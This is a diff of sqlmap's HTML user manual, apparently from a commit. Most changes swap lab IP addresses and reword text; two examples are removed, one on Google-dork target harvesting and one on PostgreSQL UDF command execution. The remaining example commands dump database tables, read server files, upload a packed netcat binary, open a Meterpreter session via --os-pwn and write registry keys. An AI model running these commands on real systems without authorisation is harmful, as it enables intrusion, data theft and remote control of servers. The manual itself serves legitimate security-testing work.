@@ -361,7 +361,7 @@ <H2><A NAME="ss2.1">2.1</A> <A HREF="#toc2.1">Generic features</A>
361361requests (multi-threading)</ B > to speed up the blind SQL injection
362362techniques. Vice versa, it is also possible to specify the number of
363363seconds to hold between each HTTP(S) request. Others optimization switches
364- to speed up the exploitation are implemented as well .
364+ to speed up the exploitation are implemented too .
365365</ LI >
366366< LI > < B > HTTP < CODE > Cookie</ CODE > header</ B > string support, useful when the
367367web application requires authentication based upon cookies and you have
@@ -1132,33 +1132,6 @@ <H3>Process Google dork results as target addresses</H3>
11321132parameters asking you if you want to test and inject on each possible
11331133affected URL.</ P >
11341134
1135- < P > Example of Google dorking with expression < CODE > site:yourdomain.com
1136- ext:php</ CODE > :</ P >
1137- < P >
1138- < BLOCKQUOTE > < CODE >
1139- < PRE >
1140- $ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
1141-
1142- [hh:mm:38] [INFO] first request to Google to get the session cookie
1143- [hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
1144- testable hosts
1145- [hh:mm:41] [INFO] sqlmap got a total of 59 targets
1146- [hh:mm:40] [INFO] url 1:
1147- GET http://yourdomain.com/example1.php?foo=12, do you want to test this
1148- url? [y/N/q] n
1149- [hh:mm:43] [INFO] url 2:
1150- GET http://yourdomain.com/example2.php?bar=24, do you want to test this
1151- url? [y/N/q] n
1152- [hh:mm:42] [INFO] url 3:
1153- GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
1154- want to test this url? [y/N/q] y
1155- [hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
1156- [...]
1157- </ PRE >
1158- </ CODE > </ BLOCKQUOTE >
1159- </ P >
1160-
1161-
11621135< H3 > Load options from a configuration INI file</ H3 >
11631136
11641137< P > Switch: < CODE > -c</ CODE > </ P >
@@ -1403,7 +1376,7 @@ <H3>Filtering targets from provided proxy log using regular expression</H3>
14031376< P > Rather than using all hosts parsed from provided logs with switch
14041377< CODE > -l</ CODE > , you can specify valid Python regular expression to be used
14051378for filtering desired ones.</ P >
1406- < P > Example usage :</ P >
1379+ < P > Example of valid syntax :</ P >
14071380< P >
14081381< BLOCKQUOTE > < CODE >
14091382< PRE >
@@ -1983,22 +1956,23 @@ <H3>Enumerate database table columns</H3>
19831956You can also provide the < CODE > -C</ CODE > option to specify the table columns
19841957name like the one you provided to be enumerated.</ P >
19851958
1986- < P > Example against a MySQL target:</ P >
1959+ < P > Example against a SQLite target:</ P >
19871960< P >
19881961< BLOCKQUOTE > < CODE >
19891962< PRE >
1990- $ python sqlmap.py -u "http://debiandev /sqlmap/mysql /get_int.php?id=1" --columns -D testdb \
1963+ $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/sqlite /get_int.php?id=1" --columns -D testdb \
19911964 -T users -C name
19921965[...]
1993- Database: testdb
1966+ Database: SQLite_masterdb
19941967Table: users
1995- [2 columns]
1996- +---------+---------------+
1997- | Column | Type |
1998- +---------+---------------+
1999- | name | varchar(500) |
2000- | surname | varchar(1000) |
2001- +---------+---------------+
1968+ [3 columns]
1969+ +---------+---------+
1970+ | Column | Type |
1971+ +---------+---------+
1972+ | id | INTEGER |
1973+ | name | TEXT |
1974+ | surname | TEXT |
1975+ +---------+---------+
20021976</ PRE >
20031977</ CODE > </ BLOCKQUOTE >
20041978</ P >
@@ -2028,7 +2002,7 @@ <H3>Dump database table entries</H3>
20282002< P >
20292003< BLOCKQUOTE > < CODE >
20302004< PRE >
2031- $ python sqlmap.py -u "http://debiandev /sqlmap/firebird/get_int.php?id=1" --dump -T users
2005+ $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/firebird/get_int.php?id=1" --dump -T users
20322006[...]
20332007Database: Firebird_masterdb
20342008Table: USERS
@@ -2208,41 +2182,11 @@ <H3>Inject custom user-defined functions (UDF)</H3>
22082182< P > These techniques are detailed in the white paper
22092183< A HREF ="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857 "> Advanced SQL injection to operating system full control</ A > .</ P >
22102184
2211- < P > Example against a PostgreSQL target:</ P >
2212- < P >
2213- < BLOCKQUOTE > < CODE >
2214- < PRE >
2215- $ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
2216-
2217- [...]
2218- web application technology: PHP 5.2.6, Apache 2.2.9
2219- back-end DBMS: PostgreSQL
2220-
2221- which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
2222- how many user-defined functions do you want to create from the shared library? 1
2223- what is the name of the UDF number 1? sys_eval
2224- how many input parameters takes UDF 'sys_eval'? (default: 1)
2225- what is the data-type of input parameter number 1? (default: text)
2226- what is the data-type of the return value? (default: text)
2227- do you want to call your injected user-defined functions now? [Y/n/q] y
2228- which UDF do you want to call?
2229- [1] sys_eval
2230- [q] Quit
2231- > 1
2232- what is the value of the parameter number 1 (data-type: text)? echo test
2233- do you want to retrieve the return value of the UDF? [Y/n]
2234- return value: 'test'
2235-
2236- do you want to call this or another injected UDF? [Y/n] n
2237- do you want to remove UDF 'sys_eval'? [Y/n] y
2238- [12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
2239- be deleted manually
2240- </ PRE >
2241- </ CODE > </ BLOCKQUOTE >
2242- </ P >
2185+ < P > Use switch < CODE > -</ CODE > < CODE > -udf-inject</ CODE > and follow the instructions.</ P >
22432186
22442187< P > If you want, you can specify the shared library local file system path
2245- via command line using < CODE > -</ CODE > < CODE > -shared-lib</ CODE > option.</ P >
2188+ via command line too by using < CODE > -</ CODE > < CODE > -shared-lib</ CODE > option. Vice
2189+ versa sqlmap will ask you for the path at runtime.</ P >
22462190
22472191< P > This feature is available only when the database management system is
22482192MySQL or PostgreSQL.</ P >
@@ -2271,7 +2215,7 @@ <H3>Read a file from the database server's file system</H3>
22712215< P >
22722216< BLOCKQUOTE > < CODE >
22732217< PRE >
2274- $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/mssql/iis/get_str2.asp?name=luther" \
2218+ $ python sqlmap.py -u "http://192.168.136.129 /sqlmap/mssql/iis/get_str2.asp?name=luther" \
22752219 --file-read "C:/example.exe" -v 1
22762220
22772221[...]
@@ -2282,14 +2226,14 @@ <H3>Read a file from the database server's file system</H3>
22822226
22832227[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
22842228[hh:mm:50] [INFO] the SQL query provided returns 3 entries
2285- C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131 /files/C__example.exe'
2229+ C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129 /files/C__example.exe'
22862230[...]
22872231
2288- $ ls -l output/192.168.136.131 /files/C__example.exe
2289- -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131 /files/C__example.exe
2232+ $ ls -l output/192.168.136.129 /files/C__example.exe
2233+ -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129 /files/C__example.exe
22902234
2291- $ file output/192.168.136.131 /files/C__example.exe
2292- output/192.168.136.131 /files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
2235+ $ file output/192.168.136.129 /files/C__example.exe
2236+ output/192.168.136.129 /files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
2293223780386 32-bit
22942238</ PRE >
22952239</ CODE > </ BLOCKQUOTE >
@@ -2320,7 +2264,7 @@ <H3>Upload a file to the database server's file system</H3>
23202264$ ls -l /tmp/nc.exe.packed
23212265-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
23222266
2323- $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/mysql/get_int.aspx?id=1" --file-write \
2267+ $ python sqlmap.py -u "http://192.168.136.129 /sqlmap/mysql/get_int.aspx?id=1" --file-write \
23242268 "/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
23252269
23262270[...]
@@ -2483,7 +2427,7 @@ <H3>Out-of-band stateful connection: Meterpreter & friends</H3>
24832427< P >
24842428< BLOCKQUOTE > < CODE >
24852429< PRE >
2486- $ python sqlmap.py -u "http://192.168.136.128 /sqlmap/mysql/get_int_51.aspx?id=1" \
2430+ $ python sqlmap.py -u "http://192.168.136.129 /sqlmap/mysql/get_int_51.aspx?id=1" \
24872431 --os-pwn -v 1 --msf-path /tmp/metasploit
24882432
24892433[...]
@@ -2552,7 +2496,7 @@ <H3>Auxiliary registry switches</H3>
25522496< P >
25532497< BLOCKQUOTE > < CODE >
25542498< PRE >
2555- $ python sqlmap.py -u http://192.168.136.128 /sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
2499+ $ python sqlmap.py -u http://192.168.136.129 /sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
25562500 --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
25572501</ PRE >
25582502</ CODE > </ BLOCKQUOTE >
0 commit comments